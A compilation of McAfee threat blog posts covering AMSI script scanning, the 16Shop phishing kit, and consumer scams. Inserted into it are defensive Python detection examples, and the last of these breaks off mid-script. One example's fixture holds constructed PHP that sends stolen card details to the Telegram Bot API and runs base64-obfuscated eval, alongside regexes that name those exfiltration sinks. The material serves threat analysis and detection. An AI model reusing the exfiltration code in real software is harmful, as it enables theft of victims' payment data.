Oliver Devane – McAfee Blogs
https://securingtomorrow.mcafee.com

McAfee AMSI Integration Protects Against Malicious Scripts
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/
Mon, 12 Aug 2019


Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how AMSI (the Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of malware since the start of 2019. This blog will show you how to enable it and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above

The AMSI scanner inspects a script at the point where the script engine is about to execute it. Every layer of obfuscation has to resolve to plain script before the engine can run it, and the engine hands that plain content to AMSI, so the scanner effectively receives the de-obfuscated script and can scan it with DAT content. This matters because the scripts as they arrive can be heavily obfuscated and are difficult to detect generically, as shown in the image below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI

Enable the Scanner

By default, the AMSI scanner is set to observe mode. This means the scanner is running but will not block any detected scripts; instead the detection appears in the ENS log and Event Viewer as shown below:

Figure 2 – Would Block in the Event log

To actively block detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking

Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log

In the Wild

Since January 2019 we have observed over 650,000 detections, as shown in the IP geo map below:

Figure 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, fileless Mimikatz and JS downloader families such as JS/Nemucod.

The sections below describe how these families operate and how their infections are spread across the globe.

PowerMiner

PowerMiner is cryptomining malware whose purpose is to infect as many machines as possible and use them to mine the Monero cryptocurrency. The initial infection vector is a phishing email containing a batch file. Once executed, the batch file downloads a malicious PowerShell script, which then begins the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz

Mimikatz is a tool that extracts credentials, including plaintext passwords, from the memory of the Windows LSASS process. Mimikatz was previously used as a standalone executable; malicious scripts have since been created that download Mimikatz straight into memory and execute it there, so the tool never touches the local disk. An example of a fileless Mimikatz script is shown below (note that in the wild this is usually heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee detects this malicious script as PS/Mimikatz.a, PS/Mimikatz.b and PS/Mimikatz.c.

JS/Downloader

JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads, such as ransomware, password stealers and backdoors, which then carry the compromise of the machine further. The infection chain is shown below, together with an example phishing email:

Figure 10 – Infection flow of Js/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7

MVISION Endpoint and ENS 10.7 (not yet released at the time of writing) will use Real Protect machine learning to detect malicious content in the buffers that PowerShell passes to AMSI.

This is done by extracting features from the AMSI buffers and running them through the ML classifier, which decides whether the script is malicious. An example of this is shown below:

Thanks to this detection technique, MVISION Endpoint can detect previously unseen (zero-day) PowerShell threats for which no signature exists yet.

Conclusion

We hope that this blog has helped highlight why enabling AMSI is important and how it will help keep your environments safe.

We recommend our customers who are using ENS 10.6 on a Windows 10 environment enable AMSI in ‘Block’ mode so that when a malicious script is detected it will be terminated. This will protect Endpoints from the threats mentioned in this blog, as well as countless others.

Customers using MVISION Endpoint are protected by default and do not need to enable ‘Block’ mode.

We also recommend reading McAfee Protects against suspicious email attachments which will help protect you against malware being spread via email, such as the JS/Downloaders described in this blog.

All testing was performed with the V3 DAT package 3637.0 which contains the latest AMSI Signatures. Signatures are being added to the V3 DAT package daily, so we recommend our customers always use the latest ones.

16Shop Now Targets Amazon
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/16shop-now-targets-amazon/
Fri, 12 Jul 2019


Since early November 2018 McAfee Labs have observed a phishing kit, dubbed 16Shop, being used by malicious actors to target Apple account holders in the United States and Japan. Typically, the victims receive an email with a pdf file attached.

An example of the message within the email is shown below, with an accompanying translation:

When victims click the link in the attached PDF, they are redirected to a phishing site where they are tricked into updating their account information, which often includes credit card details.

The following is one of the many pdf files that we have seen attached to the phishing emails:

The phishing page is shown below:

The following image shows the information that is being phished:

The following map shows the locations where we have observed this phishing campaign:

The author of this phishing campaign used the conversion site Pdfcrowd.com to create the malicious PDF attached to the phishing emails; the generator leaves its tag in the PDF, as can be seen below:
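The two things worth pulling out of such an attachment during triage are the producer tag and the link targets. The following Python is an added example, not McAfee tooling: it reads the document-info strings and every /URI link action straight out of the raw bytes, which is sufficient for the simple uncompressed PDFs that HTML-to-PDF services emit. The embedded SAMPLE_PDF is constructed, the exact Producer value Pdfcrowd writes is an assumption (the check is a case-insensitive substring match), and a file whose objects live in compressed object streams needs a real PDF parser instead.

```python
"""Triage of a PDF lure: who produced it and where its links go.

Added example, not McAfee code. It pulls the document-info strings and the
/URI link actions out of the raw bytes with regular expressions, which is
enough for the simple, uncompressed PDFs that HTML-to-PDF services emit.
SAMPLE_PDF is constructed for the demo; the Producer/Creator strings that
Pdfcrowd really writes are an assumption, and anything inside compressed
object streams would need a real PDF parser.
"""
import re
from typing import Dict, List

# Constructed minimal PDF: two link annotations (one literal string, one hex
# string) and an info dictionary. Not a real 16Shop attachment.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 6 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 200 20]
   /A << /S /URI /URI (http://verify.example.invalid/apple/?16shop) >> >> endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [0 30 200 50]
   /A << /S /URI /URI <68747470733A2F2F6578616D706C652E636F6D2F> >> >> endobj
5 0 obj << /Producer (Pdfcrowd \\(https://pdfcrowd.com\\)) /Creator (HTML to PDF demo) >> endobj
trailer << /Root 1 0 R /Info 5 0 R >>
%%EOF
"""

# A PDF literal string "( ... )" with backslash escapes, or a hex string "< ... >".
_LITERAL = rb"\(((?:\\.|[^\\()])*)\)"
_HEX = rb"<([0-9A-Fa-f\s]*)>"


def _decode_literal(raw: bytes) -> str:
    """Undo the escapes that matter here: \\( \\) and \\\\ ."""
    return re.sub(rb"\\([()\\])", rb"\1", raw).decode("latin-1")


def _decode_hex(raw: bytes) -> str:
    digits = re.sub(rb"\s", b"", raw).decode("ascii")
    if len(digits) % 2:            # PDF allows a dropped trailing nibble
        digits += "0"
    return bytes.fromhex(digits).decode("latin-1")


def pdf_strings(key: bytes, data: bytes) -> List[str]:
    """Every string value that directly follows /<key>, in file order."""
    pattern = rb"/" + key + rb"\s*(?:" + _LITERAL + rb"|" + _HEX + rb")"
    out: List[str] = []
    for m in re.finditer(pattern, data):
        if m.group(1) is not None:
            out.append(_decode_literal(m.group(1)))
        else:
            out.append(_decode_hex(m.group(2)))
    return out


def triage(data: bytes) -> Dict[str, object]:
    """Producer/Creator tags, link targets and the flags a triage queue wants."""
    producer = pdf_strings(b"Producer", data)
    creator = pdf_strings(b"Creator", data)
    uris = pdf_strings(b"URI", data)
    flags: List[str] = []
    if any("pdfcrowd" in s.lower() for s in producer + creator):
        flags.append("generated-with-pdfcrowd")      # assumed marker substring
    if any(u.lower().startswith("http://") for u in uris):
        flags.append("plain-http-link")
    if any("16shop" in u.lower() for u in uris):
        flags.append("16shop-kit-marker")            # the ?16shop query seen in the IOCs
    return {"producer": producer, "creator": creator, "uris": uris, "flags": flags}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_PDF).items():
        print(f"{k:9s} {v}")
```

On a mailbox-sized corpus this is the filter to run before anything heavier: attachments whose producer tag names a web conversion service and whose only link points at a freshly registered host deserve a human look, whatever the text says about the victim's account.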

16Shop phishing kit

The phishing kit originates in Indonesia and the code handles multiple languages:

Most phishing kits email the credit card and account details entered on the site directly to the malicious actor. The 16Shop kit does this too, and additionally stores a local copy in text files on the web server. This is a weakness in the kit: with the default settings, anyone visiting the site can download the clear-text files.

The kit includes a local blacklist that blocks certain IP addresses from accessing the website. The list contains many IP addresses belonging to security companies, including McAfee, and is there to stop malware researchers from reaching the phishing pages. A snippet is shown below:

While looking at the code we observed several comments that appear to be tags of the creator. (More on this later.)

The creator of 16Shop also developed a tool to generate and send the phishing emails. We managed to gain a copy and analyze it.

The preceding configuration shows how an attacker can set the subject field as well as the origin address of the email. While looking through the source files, we noticed the file list.txt. This file contains the list of email addresses that the phisher sends to. The example file uses the address riswandanoor@yahoo.com:

This email, along with the name in the comments from the phishing kit, could potentially tell us some more about the creators of the kit.

The author of 16Shop

The author of the kit goes by the alias DevilScreaM. We gathered lots of information on this actor and found that this individual was involved in the Indonesian hacking group “Indonesian Cyber Army.” Several websites were defaced by this group and tagged by DevilScreaM in 2012.

We found DevilScreaM created the site Newbie-Security.or.id, an Indonesian site of hacking tools frequented by members of the Indonesian Cyber Army. We also discovered two eBooks written by DevilScreaM; they contain advice on website hacking and penetration testing.

The timeline of DevilScreaM’s activity shows a notable change between late 2012 and mid-2013. DevilScreaM stopped defacing websites and created an anti-malware product, ScreaMAV, for the Indonesian market. This “white hat” activity did not last: in mid-2013 they began defacing sites again and posting exploits on 0day.today, mostly for WordPress vulnerabilities.

DevilScreaM’s GitHub page contains various tools, including a PHP remote shell used on compromised websites, as well as commits to the z1miner Monero (XMR) miner tool. In late 2017 DevilScreaM created the 16Shop phishing kit and set up a Facebook group to sell licences and support. In November 2018 this private group had over 200 members. We checked the group in mid-June 2019 and it now has over 300 members and over 200 posts. Despite the questionable content, the group not only persists unchanged on social media but continues to grow.

McAfee has notified Facebook of the existence of this group. The social network has taken an active posture in recent months of taking down groups transacting in such malicious content.

Recent News and Switch to Amazon

In May 2019, several blogs were published highlighting that a cracked version of 16Shop included a backdoor that sent all stolen data via Telegram, reportedly to the author of the kit. We can confirm that this backdoor was not present in the version we analysed in November. This leads us to believe that it was added by a second malicious actor and not by the original author of 16Shop.

[Telegram Bot API command from Cracked 16shop kit to send stolen data]
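When a kit changes hands like this, the first question for anyone analysing it is where the captured data goes. The Python below is an added example, not McAfee code and not the 16Shop source: it walks a PHP file and reports each exfiltration sink with its line number, covering the mail() call and local text-file copies described above, a Telegram Bot API call and any inline bot token, and the eval(base64_decode(...)) wrapper that backdoors are commonly hidden in. KIT_SOURCE is a constructed stand-in and the token in it is fake.

```python
"""Locate the exfiltration sinks in a phishing kit's PHP source.

Added example, not McAfee code and not 16Shop's source. When a kit is
cracked or resold, the first question is where captured data goes; this
walks the PHP and reports each sink with its line number. KIT_SOURCE is
constructed for the demo and the Telegram token in it is fake.
"""
import re
from typing import Dict, List

# Constructed stand-in for a kit's result handler (not real 16Shop code).
KIT_SOURCE = r'''<?php
$data = "Card: ".$_POST['cc']." Exp: ".$_POST['exp']." CVV: ".$_POST['cvv'];
mail($config['receiver'], "Rezult - ".$_SERVER['REMOTE_ADDR'], $data);
file_put_contents("rezult/visitors.txt", $data."\n", FILE_APPEND);
// ---- added by whoever cracked the kit ----
$t = "1234567890:AAFakeTokenForTheDemoOnly_NotReal";
@file_get_contents("https://api.telegram.org/bot".$t."/sendMessage?chat_id=987654321&text=".urlencode($data));
eval(base64_decode("ZWNobyAiaGkiOw=="));
'''

# Sink kinds and the source patterns that reveal them (assumed, not exhaustive).
SINKS = [
    ("email", re.compile(r"\bmail\s*\(")),
    ("local-file", re.compile(r"\b(file_put_contents|fwrite|fopen)\s*\(")),
    ("telegram-bot-api", re.compile(r"api\.telegram\.org/bot")),
    # Bot tokens look like <digits>:<30+ url-safe chars>; real ones are 35 chars.
    ("telegram-token-literal", re.compile(r"\b\d{6,}:[A-Za-z0-9_-]{30,}\b")),
    ("outbound-http", re.compile(
        r"\b(curl_init|curl_setopt|file_get_contents)\s*\(\s*[\"']https?://")),
    ("obfuscated-eval", re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(")),
]


def find_sinks(source: str) -> List[Dict[str, object]]:
    """One finding per (line, sink kind) with a trimmed copy of the line."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for kind, rx in SINKS:
            if rx.search(line):
                findings.append({"line": lineno, "kind": kind,
                                 "evidence": line.strip()[:80]})
    return findings


def summarize(source: str) -> Dict[str, List[int]]:
    """Map each sink kind to the line numbers where it appears."""
    out: Dict[str, List[int]] = {}
    for f in find_sinks(source):
        out.setdefault(str(f["kind"]), []).append(int(f["line"]))
    return out


if __name__ == "__main__":
    for f in find_sinks(KIT_SOURCE):
        print(f"line {f['line']:3d}  {f['kind']:24s}  {f['evidence']}")
```

Anything the summary reports beyond the kit's advertised mail() sink is a candidate backdoor; the Telegram pattern in particular is worth matching against every file in the kit, not just the result handler, since a second actor will hide it wherever the code is least likely to be read.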

In May 2019 we also found a new phishing kit, this time targeting Amazon account holders. Looking at its code, it shows several similarities to the 16Shop kit that targeted Apple users back in November 2018.

[Fake Login page]

[PHP code of Phishing Kit and Admin page]

Around the same time that we discovered the Amazon phishing kit, the social media profile picture of the actors we believe are behind 16Shop changed to a modified Amazon logo. This reinforces our assessment that the same group is responsible for developing the new kit.

[Obfuscated Profile Pic]

We believe that victims of this kit will be led to the malicious websites via links in phishing emails.

We recommend that if users want to check any account changes on Amazon, which they received via email or other sources, that they go to Amazon.com directly and navigate from there rather than following suspicious links.

Conclusion

During our monitoring, we observed over 200 Malicious URLs serving this phishing kit which highlights its widespread use (all URLs seen have been classified as malicious by McAfee).

The group responsible for the 16Shop kit continues to develop and evolve it to target a larger audience. To protect themselves, users need to be extremely vigilant when receiving unsolicited email and messages.

This demonstrates how malicious actors borrow the brands of legitimate companies to gain victims’ trust, and we expect groups like this to use other companies as bait in the future.

Indicators of compromise

Domains (all blocked by McAfee WebAdvisor)

Apple Kit

  • hxxps://secure2app-accdetall1.usa.cc.servsdlay.com/?16shop
  • hxxps://gexxodaveriviedt0.com/app1esubm1tbybz/?16shop
  • hxxps://gexxodaveriviedt0.com/secur3-appleld-verlfy1/?16shop
  • hxxps://sec2-accountdetail.accsdetdetail.com/?16shop

Amazon Kit

  • verification-amazonaccess.secure.dragnet404.com/
  • verification-amazon.servicesinit-id.com/
  • verification-amazonlocked.securesystem.waktuakumaleswaecdvhb.com/
  • verification-amazonaccess.jaremaubalenxzbhcvhsd.business/
  • verification-amazon.3utilities.com/
  • verification-amaz0n.com/

McAfee detections

  • PDF/16shop! (V2 DAT 9086, V3 DAT 3537)

Hashes (SHA-256)

  • 34f33612c9f6b132430385e6dc3f8603ff897d34c780bfa5a4cf7663922252ba
  • b43c2ba4e312d36a1b7458d1342600957e0daf3d1fcd8c7324afd387772f2cc0
  • 569612bd90de1a3a5d959abb12f0ec66f3696113b386e4f0e3a9face084b032a
  • d9070e68911db893dfe3b6acc8a8995658f2796da44f14469c73fbcb91cd1f73

Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-apps-charging-high-fees/
Wed, 13 Mar 2019


Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/
Fri, 01 Feb 2019


Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) by disguising itself as the official McAfee customer support website.

So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks the download button, they are redirected to a screen prompting them to enter their name, email address, contact number and product activation key to proceed with the download. However, when the user clicks the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

  • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
  • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
  • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/
Thu, 06 Dec 2018


Rockstar Games’ Red Dead Redemption 2 has struck a chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the game, while simultaneously making a profit on those downloads.

You’re probably wondering how exactly this scam works. It begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter and blog posts. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little differently. When the user clicks the “download” button, they are presented with a fake install screen showing the progress of the game’s download. The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded to the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Don’t Get PWNed by Fake Gaming Currency Sites
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-gaming-currency-sites/
Fri, 16 Nov 2018


If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

“League of Legends” YouTube Cheat Links: Nothing to “LOL” About
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/league-of-legends-youtube-cheat-links/
Fri, 09 Nov 2018

If you’re an avid gamer, you’ve probably come across a game that just seems impossible to complete. That’s because, thanks to the internet, it’s so simple to look for cheats to games on YouTube to help you level up. Most cheats exist in the form of software patches that execute files in order to activate the cheat. However, malware and PUP (short for “potentially unwanted program”) authors are using gaming cheats to trick users into downloading their malicious files in order to make a profit. And that’s exactly what YouTube channel owner “LoL Master” has been doing to “League of Legends” players.

So how exactly does this “LoL Master” trick these innocent users? The cybercriminal uploads videos to his or her YouTube channel that demonstrate how to use various cheat files, which also provide links pointing to websites that allegedly distribute cheats and stolen accounts. When players click on these links, however, they’re now exposed to cyberthreats.

When on these sites, players will be prompted to download the cheat files, but the files are actually bundled with other malicious files uploaded by wannabe cybercriminals. If users click download, PUP installers distribute the bundled files and push them onto a victim’s device. “LoL Master” makes a profit on these downloads while the victim’s device suffers from malware.

“League of Legends” players may not pick up on this scheme for a number of reasons. First, the file hosting site falsely claims that the malware analysis software VirusTotal scanned the file. Second, the site attempts to block antimalware scanners from detecting the malicious files by putting them in a password-protected zip file. If the player isn’t using antimalware software, the PUP installer will push adware or other malicious software onto the victim’s device once they unzip the file.

So, what steps can players take to avoid this malicious trick? Check out the following tips to help protect your online security:

  • Browse with caution. Although it may seem harmless to peruse YouTube comments and descriptions, malware and PUP authors use this as a vector to push their malicious downloads. Use discretion when clicking on any links included in these comments.
  • Don’t download something unless it comes from a trusted source. It is one thing to browse around YouTube comments, it is another entirely to download items from sketchy sites. Only download software from legitimate sources, and if you’re unsure if the site is trustworthy, it is best to just avoid it entirely.
  • Use security software to surf the web safely. It can be hard to identify which sites out there are malicious. Get some support by using a tool like McAfee WebAdvisor, which safeguards you from cyberthreats while you browse.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post “League of Legends” YouTube Cheat Links: Nothing to “LOL” About appeared first on McAfee Blogs.

Connected or Compromised? How to Stay Secure While Using Push Notifications
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/browser-push-notifications/
Tue, 06 Nov 2018 19:02:17 +0000

You’re probably familiar with push notifications – messages sent by app publishers that pop up on your desktop or mobile device. Browser push notifications are messages from websites that users have granted permission to serve them the latest news without having to open the actual website. While push notifications are a handy way to stay current with social media and the latest news from your favorite apps, the researchers here at McAfee have observed that these notifications have some compromising features, which impact both Chrome and Firefox browsers.

It turns out there are some real cybersecurity risks involved with taking advantage of the convenience of browser push notifications. That’s because to show push notifications, website owners must utilize pop-up ads that first request permission to show notifications. Essentially, users are tricked into thinking that the request is coming from the host site instead of the pop-up. This feature is currently being exploited by adware companies, which are using it to load unwanted advertisements onto users’ screens. Oftentimes, these ads contain offensive or inappropriate material, and users can even be exposed to irritating pop-ups that could potentially lead to viruses and malware.

So, how can users enjoy the convenience of push notifications without putting themselves at risk of a cyberattack? Check out the following tips:

  • Follow Google Chrome’s instructions on how to allow or block notifications. Check out this step-by-step guide to customize which sites you receive push notifications from and which ones you don’t.
  • Customize your Firefox notification options. You can check the status of which sites you have given permission to send notifications your way and choose whether to have the browser always ask for permission, allow or block notifications.
  • Use parental controls. No one wants inappropriate ads, especially parents of young children. To prevent exposing your kids to the inappropriate adverts that could result from push notifications, implement parental controls on your desktop. This additional filtering could prevent your child from accidentally clicking on malicious content that could infect your device.
  • When in doubt, block it out. If you come across a push notification pop-up from a suspicious-looking website or unfamiliar app, click on the ‘Block’ option to stay on the safe side.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Connected or Compromised? How to Stay Secure While Using Push Notifications appeared first on McAfee Blogs.

Phishing Attacks Employ Old but Effective Password Stealer
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/
Thu, 21 Jul 2016 23:55:36 +0000

A few months ago we received a sample from a customer that turned out to be a password stealer (PWS). One thing about this malware stood out: the subdirectory used in the access panel URL. It contained the string “***=**U=TEAM” (which we have obfuscated). Our investigations led us to believe this may be a case of industrial espionage.

The actors use compromised websites to host their access panels. Luckily for us they made a mistake and left the ZIP file they dropped on the compromised site.

This enabled us to see how the back-end of the panel works. The ZIP file contains five files:

The three files of interest are config.php, index.php, and install.php.

Config.php contains the password for the MySQL server they will set up.

Install.php creates the database and sets up the panel to store the passwords stolen by the malware. We found the following snippet in the code:

We did some searching and found that “Bilal Ghouri” was originally responsible for the PHP back-end of the popular PWS Hackhound Stealer, which was released in 2009.

We also found this warning at the end of the code:

Surely they would have remembered to delete this file!

The most important file is index.php. This file is responsible for storing the passwords uploaded by the malware and also enables the actors to search and export the data.

It is interesting that the script checks for a specific user agent, “HardCore Software For : Public.”

This user agent is used by the malware when uploading the stolen data. The PHP script checks if the user agent matches the hardcoded one before allowing any data to be uploaded.

The malware in use is ISR Stealer, a modified version of Hackhound Stealer. Our findings are confirmed by the comments in the preceding PHP code.
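The fixed user agent the panel insists on is just as useful on the defender's side. As an added example (not McAfee's code, and not part of the original post), the following Python flags outbound proxy-log requests carrying that exact string and lists the destination hosts so their owners can be notified; the log format and every log line are constructed for the demonstration.

```python
"""Proxy-log hunt for the ISR Stealer upload beacon described in this post.

Added example, not McAfee's code. The post says the panel's index.php only
accepts uploads whose User-Agent is exactly "HardCore Software For : Public.";
the same fixed string is therefore a cheap, high-confidence indicator in
outbound proxy logs. The log format (Apache combined-style, request line
carrying a full URL as a forward proxy logs it) and every line in SAMPLE_LOG
are constructed for this demonstration.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

ISR_STEALER_UA = "HardCore Software For : Public."

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Hit:
    client: str
    timestamp: str
    method: str
    url: str


def parse_line(line: str):
    """Fields of one log line, or None when the line does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_isr_uploads(lines, ua: str = ISR_STEALER_UA):
    """One Hit per request whose User-Agent equals the stealer's string.

    Exact comparison, because the panel itself checks for an exact match;
    a looser substring test would catch variants but also widen false positives."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count and review these
        if rec["ua"].strip() == ua:
            hits.append(Hit(rec["ip"], rec["ts"], rec["method"], rec["url"]))
    return hits


def panel_hosts(hits) -> list:
    """Distinct destination hosts, i.e. the compromised sites hosting panels
    that should be reported to their owners (as the post describes doing)."""
    return sorted({urlparse(h.url).hostname for h in hits if urlparse(h.url).hostname})


# Constructed log lines: two beacons to two panels, normal browsing, a
# near-miss user agent (missing the trailing dot) and one malformed line.
SAMPLE_LOG = [
    '10.0.0.12 - - [09/Mar/2016:10:12:01 +0000] "GET http://www.example.com/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/44.0"',
    '10.0.0.12 - - [09/Mar/2016:10:12:07 +0000] "POST http://compromised-site.example/panel/index.php HTTP/1.1" 200 17 "-" "HardCore Software For : Public."',
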